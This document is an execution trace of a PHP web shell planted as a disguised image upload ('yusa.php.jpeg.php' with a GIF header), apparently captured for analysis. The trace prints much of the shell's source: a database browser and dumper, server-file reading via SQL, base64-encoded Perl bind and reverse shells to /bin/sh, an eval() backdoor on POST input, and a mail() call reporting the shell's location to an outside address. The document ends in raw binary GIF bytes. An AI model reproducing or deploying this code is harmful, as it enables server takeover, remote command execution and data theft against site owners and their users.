@pg_fetch_assoc($res);\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction listDbs() {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n return $this->query("SHOW databases");\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!=\'t\'");\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction listTables() {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\treturn $this->res = $this->query(\'SHOW TABLES\');\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn $this->res = $this->query("select table_name from information_schema.tables where table_schema != \'information_schema\' AND table_schema != \'pg_catalog\'");\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction error() {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\treturn @mysql_error();\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn @pg_last_error();\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction setCharset($str) {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\tif(function_exists(\'mysql_set_charset\'))\r\n\t\t\t\t\t\treturn @mysql_set_charset($str, $this->link);\r\n\t\t\t\t\telse\r\n\t\t\t\t\t\t$this->query(\'SET CHARSET \'.$str);\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn @pg_set_client_encoding($this->link, $str);\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction loadFile($str) {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\treturn $this->fetch($this->query("SELECT LOAD_FILE(\'".addslashes($str)."\') as file"));\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\t$this->query("CREATE TABLE BOFF2(file text);COPY BOFF2 FROM \'".addslashes($str)."\';select file from BOFF2;");\r\n\t\t\t\t\t$r=array();\r\n\t\t\t\t\twhile($i=$this->fetch())\r\n\t\t\t\t\t\t$r[] = $i[\'file\'];\r\n\t\t\t\t\t$this->query(\'drop table BOFF2\');\r\n\t\t\t\t\treturn array(\'file\'=>implode("\\n",$r));\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction dump($table, $fp = false) {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\t$res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\');\r\n\t\t\t\t\t$create = mysql_fetch_array($res);\r\n\t\t\t\t\t$sql = $create[1].";\\n";\r\n if($fp) fwrite($fp, $sql); else echo($sql);\r\n\t\t\t\t\t$this->query(\'SELECT * FROM `\'.$table.\'`\');\r\n $head = true;\r\n\t\t\t\t\twhile($item = $this->fetch()) {\r\n\t\t\t\t\t\t$columns = array();\r\n\t\t\t\t\t\tforeach($item as $k=>$v) {\r\n if($v == null)\r\n $item[$k] = "NULL";\r\n elseif(is_numeric($v))\r\n $item[$k] = $v;\r\n else\r\n $item[$k] = "\'".@mysql_real_escape_string($v)."\'";\r\n\t\t\t\t\t\t\t$columns[] = "`".$k."`";\r\n\t\t\t\t\t\t}\r\n if($head) {\r\n $sql = \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).") VALUES \\n\\t(".implode(", ", $item).\')\';\r\n $head = false;\r\n } else\r\n $sql = "\\n\\t,(".implode(", ", $item).\')\';\r\n if($fp) fwrite($fp, $sql); else echo($sql);\r\n\t\t\t\t\t}\r\n if(!$head)\r\n if($fp) fwrite($fp, ";\\n\\n"); else echo(";\\n\\n");\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\t$this->query(\'SELECT * FROM \'.$table);\r\n\t\t\t\t\twhile($item = $this->fetch()) {\r\n\t\t\t\t\t\t$columns = array();\r\n\t\t\t\t\t\tforeach($item as $k=>$v) {\r\n\t\t\t\t\t\t\t$item[$k] = "\'".addslashes($v)."\'";\r\n\t\t\t\t\t\t\t$columns[] = $k;\r\n\t\t\t\t\t\t}\r\n $sql = \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\'."\\n";\r\n if($fp) fwrite($fp, $sql); else echo($sql);\r\n\t\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t};\r\n\t$db = new DbClass($_POST[\'type\']);\r\n\tif(@$_POST[\'p2\']==\'download\') {\r\n\t\t$db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']);\r\n\t\t$db->selectdb($_POST[\'sql_base\']);\r\n switch($_POST[\'charset\']) {\r\n case "Windows-1251": $db->setCharset(\'cp1251\'); break;\r\n case "UTF-8": $db->setCharset(\'utf8\'); break;\r\n case "KOI8-R": $db->setCharset(\'koi8r\'); break;\r\n case "KOI8-U": $db->setCharset(\'koi8u\'); break;\r\n case "cp866": $db->setCharset(\'cp866\'); break;\r\n }\r\n if(empty($_POST[\'file\'])) {\r\n ob_start("ob_gzhandler", 4096);\r\n header("Content-Disposition: attachment; filename=dump.sql");\r\n header("Content-Type: text/plain");\r\n foreach($_POST[\'tbl\'] as $v)\r\n\t\t\t\t$db->dump($v);\r\n exit;\r\n } elseif($fp = @fopen($_POST[\'file\'], \'w\')) {\r\n foreach($_POST[\'tbl\'] as $v)\r\n $db->dump($v, $fp);\r\n fclose($fp);\r\n unset($_POST[\'p2\']);\r\n } else\r\n die(\'<script>alert("Error! Can\\\'t open file");window.history.back(-1)</script>\');\r\n\t}\r\n\tBOFFHeader();\r\n\techo "\r\n<h1>Sql browser</h1><div class=content>\r\n<form name=\'sf\' method=\'post\' onsubmit=\'fs(this);\'><table cellpadding=\'2\' cellspacing=\'0\'><tr>\r\n<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>\r\n<input type=hidden name=a value=Sql><input type=hidden name=p1 value=\'query\'><input type=hidden name=p2 value=\'\'><input type=hidden name=c value=\'". htmlspecialchars($GLOBALS[\'cwd\']) ."\'><input type=hidden name=charset value=\'". (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\') ."\'>\r\n<td><select name=\'type\'><option value=\'mysql\' ";\r\n if(@$_POST[\'type\']==\'mysql\')echo \'selected\';\r\necho ">MySql</option><option value=\'pgsql\' ";\r\nif(@$_POST[\'type\']==\'pgsql\')echo \'selected\';\r\necho ">PostgreSql</option></select></td>\r\n<td><input type=text name=sql_host value=\'". (empty($_POST[\'sql_host\'])?\'localhost\':htmlspecialchars($_POST[\'sql_host\'])) ."\'></td>\r\n<td><input type=text name=sql_login value=\'". (empty($_POST[\'sql_login\'])?\'root\':htmlspecialchars($_POST[\'sql_login\'])) ."\'></td>\r\n<td><input type=text name=sql_pass value=\'". (empty($_POST[\'sql_pass\'])?\'\':htmlspecialchars($_POST[\'sql_pass\'])) ."\'></td><td>";\r\n\t$tmp = "<input type=text name=sql_base value=\'\'>";\r\n\tif(isset($_POST[\'sql_host\'])){\r\n\t\tif($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) {\r\n\t\t\tswitch($_POST[\'charset\']) {\r\n\t\t\t\tcase "Windows-1251": $db->setCharset(\'cp1251\'); break;\r\n\t\t\t\tcase "UTF-8": $db->setCharset(\'utf8\'); break;\r\n\t\t\t\tcase "KOI8-R": $db->setCharset(\'koi8r\'); break;\r\n\t\t\t\tcase "KOI8-U": $db->setCharset(\'koi8u\'); break;\r\n\t\t\t\tcase "cp866": $db->setCharset(\'cp866\'); break;\r\n\t\t\t}\r\n\t\t\t$db->listDbs();\r\n\t\t\techo "<select name=sql_base><option value=\'\'></option>";\r\n\t\t\twhile($item = $db->fetch()) {\r\n\t\t\t\tlist($key, $value) = each($item);\r\n\t\t\t\techo \'<option value="\'.$value.\'" \'.($value==$_POST[\'sql_base\']?\'selected\':\'\').\'>\'.$value.\'</option>\';\r\n\t\t\t}\r\n\t\t\techo \'</select>\';\r\n\t\t}\r\n\t\telse echo $tmp;\r\n\t}else\r\n\t\techo $tmp;\r\n\techo "</td>\r\n\t\t\t\t<td><input type=submit value=\'>>\' onclick=\'fs(d.sf);\'></td>\r\n <td><input type=checkbox name=sql_count value=\'on\'" . (empty($_POST[\'sql_count\'])?\'\':\' checked\') . "> count the number of rows</td>\r\n\t\t\t</tr>\r\n\t\t</table>\r\n\t\t<script>\r\n s_db=\'".@addslashes($_POST[\'sql_base\'])."\';\r\n function fs(f) {\r\n if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\r\n if(f.p1) f.p1.value=\'\';\r\n if(f.p2) f.p2.value=\'\';\r\n if(f.p3) f.p3.value=\'\';\r\n }\r\n }\r\n\t\t\tfunction st(t,l) {\r\n\t\t\t\td.sf.p1.value = \'select\';\r\n\t\t\t\td.sf.p2.value = t;\r\n if(l && d.sf.p3) d.sf.p3.value = l;\r\n\t\t\t\td.sf.submit();\r\n\t\t\t}\r\n\t\t\tfunction is() {\r\n\t\t\t\tfor(i=0;i<d.sf.elements[\'tbl[]\'].length;++i)\r\n\t\t\t\t\td.sf.elements[\'tbl[]\'][i].checked = !d.sf.elements[\'tbl[]\'][i].checked;\r\n\t\t\t}\r\n\t\t</script>";\r\n\tif(isset($db) && $db->link){\r\n\t\techo "<br/><table width=100% cellpadding=2 cellspacing=0>";\r\n\t\t\tif(!empty($_POST[\'sql_base\'])){\r\n\t\t\t\t$db->selectdb($_POST[\'sql_base\']);\r\n\t\t\t\techo "<tr><td width=1 style=\'border-top:2px solid #666;\'><span>Tables:</span><br><br>";\r\n\t\t\t\t$tbls_res = $db->listTables();\r\n\t\t\t\twhile($item = $db->fetch($tbls_res)) {\r\n\t\t\t\t\tlist($key, $value) = each($item);\r\n if(!empty($_POST[\'sql_count\']))\r\n $n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\'));\r\n\t\t\t\t\t$value = htmlspecialchars($value);\r\n\t\t\t\t\techo "<nobr><input type=\'checkbox\' name=\'tbl[]\' value=\'".$value."\'> <a href=# onclick=\\"st(\'".$value."\',1)\\">".$value."</a>" . (empty($_POST[\'sql_count\'])?\' \':" <small>({$n[\'n\']})</small>") . "</nobr><br>";\r\n\t\t\t\t}\r\n\t\t\t\techo "<input type=\'checkbox\' onclick=\'is();\'> <input type=button value=\'Dump\' onclick=\'document.sf.p2.value=\\"download\\";document.sf.submit();\'><br>File path:<input type=text name=file value=\'dump.sql\'></td><td style=\'border-top:2px solid #666;\'>";\r\n\t\t\t\tif(@$_POST[\'p1\'] == \'select\') {\r\n\t\t\t\t\t$_POST[\'p1\'] = \'query\';\r\n $_POST[\'p3\'] = $_POST[\'p3\']?$_POST[\'p3\']:1;\r\n\t\t\t\t\t$db->query(\'SELECT COUNT(*) as n FROM \' . $_POST[\'p2\']);\r\n\t\t\t\t\t$num = $db->fetch();\r\n\t\t\t\t\t$pages = ceil($num[\'n\'] / 30);\r\n echo "<script>d.sf.onsubmit=function(){st(\\"" . $_POST[\'p2\'] . "\\", d.sf.p3.value)}</script><span>".$_POST[\'p2\']."</span> ({$num[\'n\']} records) Page # <input type=text name=\'p3\' value=" . ((int)$_POST[\'p3\']) . ">";\r\n echo " of $pages";\r\n if($_POST[\'p3\'] > 1)\r\n echo " <a href=# onclick=\'st(\\"" . $_POST[\'p2\'] . \'", \' . ($_POST[\'p3\']-1) . ")\'>< Prev</a>";\r\n if($_POST[\'p3\'] < $pages)\r\n echo " <a href=# onclick=\'st(\\"" . $_POST[\'p2\'] . \'", \' . ($_POST[\'p3\']+1) . ")\'>Next ></a>";\r\n $_POST[\'p3\']--;\r\n\t\t\t\t\tif($_POST[\'type\']==\'pgsql\')\r\n\t\t\t\t\t\t$_POST[\'p2\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30);\r\n\t\t\t\t\telse\r\n\t\t\t\t\t\t$_POST[\'p2\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\';\r\n\t\t\t\t\techo "<br><br>";\r\n\t\t\t\t}\r\n\t\t\t\tif((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p2\'])) {\r\n\t\t\t\t\t$db->query(@$_POST[\'p2\']);\r\n\t\t\t\t\tif($db->res !== false) {\r\n\t\t\t\t\t\t$title = false;\r\n\t\t\t\t\t\techo \'<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">\';\r\n\t\t\t\t\t\t$line = 1;\r\n\t\t\t\t\t\twhile($item = $db->fetch())\t{\r\n\t\t\t\t\t\t\tif(!$title)\t{\r\n\t\t\t\t\t\t\t\techo \'<tr>\';\r\n\t\t\t\t\t\t\t\tforeach($item as $key => $value)\r\n\t\t\t\t\t\t\t\t\techo \'<th>\'.$key.\'</th>\';\r\n\t\t\t\t\t\t\t\treset($item);\r\n\t\t\t\t\t\t\t\t$title=true;\r\n\t\t\t\t\t\t\t\techo \'</tr><tr>\';\r\n\t\t\t\t\t\t\t\t$line = 2;\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\techo \'<tr class="l\'.$line.\'">\';\r\n\t\t\t\t\t\t\t$line = $line==1?2:1;\r\n\t\t\t\t\t\t\tforeach($item as $key => $value) {\r\n\t\t\t\t\t\t\t\tif($value == null)\r\n\t\t\t\t\t\t\t\t\techo \'<td><i>null</i></td>\';\r\n\t\t\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t\t\techo \'<td>\'.nl2br(htmlspecialchars($value)).\'</td>\';\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\techo \'</tr>\';\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\techo \'</table>\';\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo \'<div><b>Error:</b> \'.htmlspecialchars($db->error()).\'</div>\';\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\techo "<br></form><form onsubmit=\'d.sf.p1.value=\\"query\\";d.sf.p2.value=this.query.value;document.sf.submit();return false;\'><textarea name=\'query\' style=\'width:100%;height:100px\'>";\r\n if(!empty($_POST[\'p2\']) && ($_POST[\'p1\'] != \'loadfile\'))\r\n echo htmlspecialchars($_POST[\'p2\']);\r\n echo "</textarea><br/><input type=submit value=\'Execute\'>";\r\n\t\t\t\techo "</td></tr>";\r\n\t\t\t}\r\n\t\t\techo "</table></form><br/>";\r\n if($_POST[\'type\']==\'mysql\') {\r\n $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, \'@\', `host`) = USER() AND `File_priv` = \'y\'");\r\n if($db->fetch())\r\n echo "<form onsubmit=\'d.sf.p1.value=\\"loadfile\\";document.sf.p2.value=this.f.value;document.sf.submit();return false;\'><span>Load file</span> <input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form>";\r\n }\r\n\t\t\tif(@$_POST[\'p1\'] == \'loadfile\') {\r\n\t\t\t\t$file = $db->loadFile($_POST[\'p2\']);\r\n\t\t\t\techo \'<pre class=ml1>\'.htmlspecialchars($file[\'file\']).\'</pre>\';\r\n\t\t\t}\r\n\t} else {\r\n echo htmlspecialchars($db->error());\r\n }\r\n\techo \'</div>\';\r\n\tBOFFFooter();\r\n}\r\nfunction actionNetwork() {\r\n\tBOFFHeader();\r\n\t$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";\r\n\t$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";\r\n\techo "<h1>Network tools</h1><div class=content>\r\n\t<form name=\'nfp\' onSubmit=\\"g(null,null,\'bpp\',this.port.value);return false;\\">\r\n\t<span>Bind port to /bin/sh [perl]</span><br/>\r\n\tPort: <input type=\'text\' name=\'port\' value=\'31337\'> <input type=submit value=\'>>\'>\r\n\t</form>\r\n\t<form name=\'nfp\' onSubmit=\\"g(null,null,\'bcp\',this.server.value,this.port.value);return false;\\">\r\n\t<span>Back-connect [perl]</span><br/>\r\n\tServer: <input type=\'text\' name=\'server\' value=\'". $_SERVER[\'REMOTE_ADDR\'] ."\'> Port: <input type=\'text\' name=\'port\' value=\'31337\'> <input type=submit value=\'>>\'>\r\n\t</form><br>";\r\n\tif(isset($_POST[\'p1\'])) {\r\n\t\tfunction cf($f,$t) {\r\n\t\t\t$w = @fopen($f,"w") or @function_exists(\'file_put_contents\');\r\n\t\t\tif($w){\r\n\t\t\t\t@fwrite($w,@base64_decode($t));\r\n\t\t\t\t@fclose($w);\r\n\t\t\t}\r\n\t\t}\r\n\t\tif($_POST[\'p1\'] == \'bpp\') {\r\n\t\t\tcf("/tmp/bp.pl",$bind_port_p);\r\n\t\t\t$out = BOFFEx("perl /tmp/bp.pl ".$_POST[\'p2\']." 1>/dev/null 2>&1 &");\r\n\t\t\techo "<pre class=ml1>$out\\n".BOFFEx("ps aux | grep bp.pl")."</pre>";\r\n unlink("/tmp/bp.pl");\r\n\t\t}\r\n\t\tif($_POST[\'p1\'] == \'bcp\') {\r\n\t\t\tcf("/tmp/bc.pl",$back_connect_p);\r\n\t\t\t$out = BOFFEx("perl /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." 1>/dev/null 2>&1 &");\r\n\t\t\techo "<pre class=ml1>$out\\n".BOFFEx("ps aux | grep bc.pl")."</pre>";\r\n unlink("/tmp/bc.pl");\r\n\t\t}\r\n\t}\r\n\techo \'</div>\';\r\n\tBOFFFooter();\r\n}\r\nfunction actionRC() {\r\n\tif(!@$_POST[\'p1\']) {\r\n\t\t$a = array(\r\n\t\t\t"uname" => php_uname(),\r\n\t\t\t"php_version" => phpversion(),\r\n\t\t\t"BOFF_version" => BOFF_VERSION,\r\n\t\t\t"safemode" => @ini_get(\'safe_mode\')\r\n\t\t);\r\n\t\techo serialize($a);\r\n\t} else {\r\n\t\teval($_POST[\'p1\']);\r\n\t}\r\n}\r\nif( empty($_POST[\'a\']) )\r\n\tif(isset($default_action) && function_exists(\'action\' . $default_action))\r\n\t\t$_POST[\'a\'] = $default_action;\r\n\telse\r\n\t\t$_POST[\'a\'] = \'SecInfo\';\r\nif( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) )\r\n\tcall_user_func(\'action\' . $_POST[\'a\']);\r\nexit;\r\n?>\r\n' /var/www/html/uploads/yusa.php.jpeg.php 48 0
2 A /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 3 $web = 'localhost'
2 A /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 4 $inj = '/uploads/yusa.php.jpeg.php'
3 7 0 0.006143 992568 htmlspecialchars 0 /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 5 1 NULL
3 7 1 0.006161 992760
3 7 R ''
3 8 0 0.006181 992632 htmlspecialchars 0 /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 6 1 NULL
3 8 1 0.006195 992824
3 8 R ''
3 9 0 0.006209 992648 htmlspecialchars 0 /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 7 1 '/uploads/yusa.php.jpeg.php'
3 9 1 0.006224 992840
3 9 R '/uploads/yusa.php.jpeg.php'
3 10 0 0.006240 992696 htmlspecialchars 0 /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 7 1 'localhost'
3 10 1 0.006254 992888
3 10 R 'localhost'
2 A /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 7 $body = 'Egy_Spider \nUserName: \nPassWord:\r\n\nMessage:\n\nE-server: /uploads/yusa.php.jpeg.php\nE-server2: localhost\n\nIP: \r\n'
3 11 0 0.006288 992808 mail 0 /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 9 3 'wp@live.fr' 'Shell http://localhost/uploads/yusa.php.jpeg.php' 'Egy_Spider \nUserName: \nPassWord:\r\n\nMessage:\n\nE-server: /uploads/yusa.php.jpeg.php\nE-server2: localhost\n\nIP: \r\n'
3 11 1 0.007384 992904
3 11 R FALSE
2 A /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 11 $auth_pass = ''
2 A /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 12 $color = '#df5'
2 A /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 13 $default_action = 'FilesMan'
2 A /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 14 $default_use_ajax = TRUE
2 A /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 15 $default_charset = 'Windows-1251'
2 A /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 18 $userAgents = [0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler']
3 12 0 0.007496 992728 implode 0 /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 19 2 '|' [0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler']
3 12 1 0.007519 992872
3 12 R 'Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler'
3 13 0 0.007537 992808 preg_match 0 /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 19 2 '/Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler/i' 'python-requests/2.25.1'
3 13 1 0.007557 992872
3 13 R 0
3 14 0 0.007570 992728 session_start 0 /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 25 0
3 14 1 0.007589 992728
3 14 R FALSE
3 15 0 0.007603 992728 ini_set 0 /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 26 2 'error_log' NULL
3 15 1 0.007620 992800
3 15 R ''
3 16 0 0.007633 992728 ini_set 0 /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 27 2 'log_errors' 0
3 16 1 0.007648 992800
3 16 R '1'
3 17 0 0.007661 992728 ini_set 0 /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 28 2 'max_execution_time' 0
3 17 1 0.007678 992832
3 17 R '30'
3 18 0 0.007691 992728 set_time_limit 0 /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 29 1 0
3 18 1 0.007712 992792
3 18 R FALSE
2 6 1 0.007738 993848
1 3 1 0.007753 959128
1 19 0 0.007767 959160 Error->__toString 0 Unknown 0 0
2 20 0 0.007780 959240 Error->getTraceAsString 0 Unknown 0 0
2 20 1 0.007793 959496
2 20 R '#0 /var/www/html/uploads/yusa.php.jpeg.php(48): eval()\n#1 {main}'
1 19 1 0.007811 959792
1 19 R 'Error: Call to undefined function set_magic_quotes_runtime() in /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()\'d code:30\nStack trace:\n#0 /var/www/html/uploads/yusa.php.jpeg.php(48): eval()\n#1 {main}'
0.007858 880440
TRACE END [2023-02-12 19:26:36.848740]
Generated HTML code
<html><head></head><body>GIF89a=(�'7IAXKgN
gYvY
x\%wh
�h�t�h%�s%�x �}9�� ��&��%��(��.��5��D��&ǚ)ǟ5ǘ;ͣ*ȡ&ղ)ׯ7<ѻ4�3��H֧KͯT��Y��q��q��F�!�
'!�
NETSCAPE2.0,=(���pH,�Ȥr�l:�ШtJ�Z�جv��z��xL.���z�n���|N�����~��������������������������������������������g���E�����������E�����B����ȸ��D�����Ů��H��L��D٫D�B�����D���T���H�G��A R�ڐ
|��
٭&��E8���kG�
A�px�a���
R2XB��E
8I���6X�:vT)���q�賥�仕F~%x� �
4#ZԉO|-4Bs��X:=
Q� ��l��yXJ�GȦ|s
h��K�3l7�B|�$'7Jީܪ����D�n=�P�
����`䌨lj����v>���5
�.69�ϸd�����nlv����f{���Pb�
�l5���p�
���
�3a��
�I�O
�����އ��Ƃ��i�����#��)p� ��{�)vm��%D~
6f�s}Ń �D�WE�`�� ��L8x����{)
x`X/>�}m����Rؑ* |`D�=��_^�5
!_�'a�Oڗ
7�c��`D�Cx`�
¥��Y��F����?�����n@`�} lď���@4>�d
���v�xN
�י@�d��=�g�
s�G���
���ud &p8Q�)��lXD����A�H�ySun� j���k*D�LH�]
���C�J��Xb~ʪwSt�6K,��q��:9ت:���l�@�`��� �.۬�t��S�[:��=����N�����{¿�A�R�����6����0�_ �;������^���#����!�Ę�U���;0L1�����p%
A��U̬ݵ��%霼��
���~` �G����
���=4�np�3���������u�u�ٮ|%2�I��r�#0��J``8�@S@5�
���^`8E�]�.�����7 �ȉ�j��D� z���i�������!���l��w�*�D�I�nEX��� &A�Go�Qf��F��;����J����F5��Q|���X��T��y�� �]�o��C =������PB@ D��(>�C�x�`��
��JЀ�۠��p+eE0`�`A
�/NE�؆�9�@��� H�7���%B�`�l*���8 2�%� ��:�1��E��ux%nP1�!��C)�P81l�ɸF#��{����B�0>��
�b����O�3Ȗ�()yRpb��E.Z�D8�
H@%
�x+%٘�c� ���f��b�d�`F�8�XH"��-
�|1�6iI, 2���$+](A*j�
QT�o�.�U슬�ㄎ`�SN�����y�e�������b��o� �)
�y�@��3 �tT̉�&�+�L�f"�-|
����>��v��\�Q1)�@��h#aP72����$�!�
",=(�7IAXG]KgN
gYvY
xR"k\%w]'}h�t�h%�g+�s%�r.�m3�x3�x �}9��&��+��7��%��(��.��D��&ǘ;͕&ײ)4��6�K��@�pH,�Ȥr�l:�ШtJ�Z�جv��z��xL.���z�n���|N�����~��������������������������������������������g��E��
�������E
�´���C���Ƕ���D�ÕƷ�ʱH��M��GڬD�B����D��T����G���C�C� l&�:'�tU�6ɹ#��)�'�.6�&��Ȼ
K(8p0N�?!�2"ۈNIJX>R��O�M '��2�*��>#n��
�@�<[:�I�f���T�˘Cdb�ٓ[��E�5MBo��@�`@���tW-3 ���B���jI݅E�9[T�$��ﯧ���s��ȳ����dc�UUρ
#���ldj?����`\����u|3']�6 �S#���FKL�*N
E����$��e�YD��q�.�촁�s \-�jA
9�����-��M[�x(�s��x�|����p��
��k�T�DpE@W� ��]k�1����Yb ���
l��*n0�癗�zBdОu�7ĉBl��-�x~|U�U�
�h�*H�� |��e"#"?vp�i�e6^��+q��m8 #V��<f���c��^f9�#��ragb�d�(0$k��
��'l�)b�]���e�>���
V��|���m"с�n|@�U��Ξ��pb�G�ED�����2F�I�?
>�x�
��
���%��j��ꄯ<�a�9ij�2�D��&��Z`��]w���:�6��B�7eFJ|�ҧ�,���FǮcS�ʶ+B�,�ޘ�N���>PAD�HD�枫��n��}�#˒�
Q��S���
2�X�{�k�lQ�2�����w�|2�
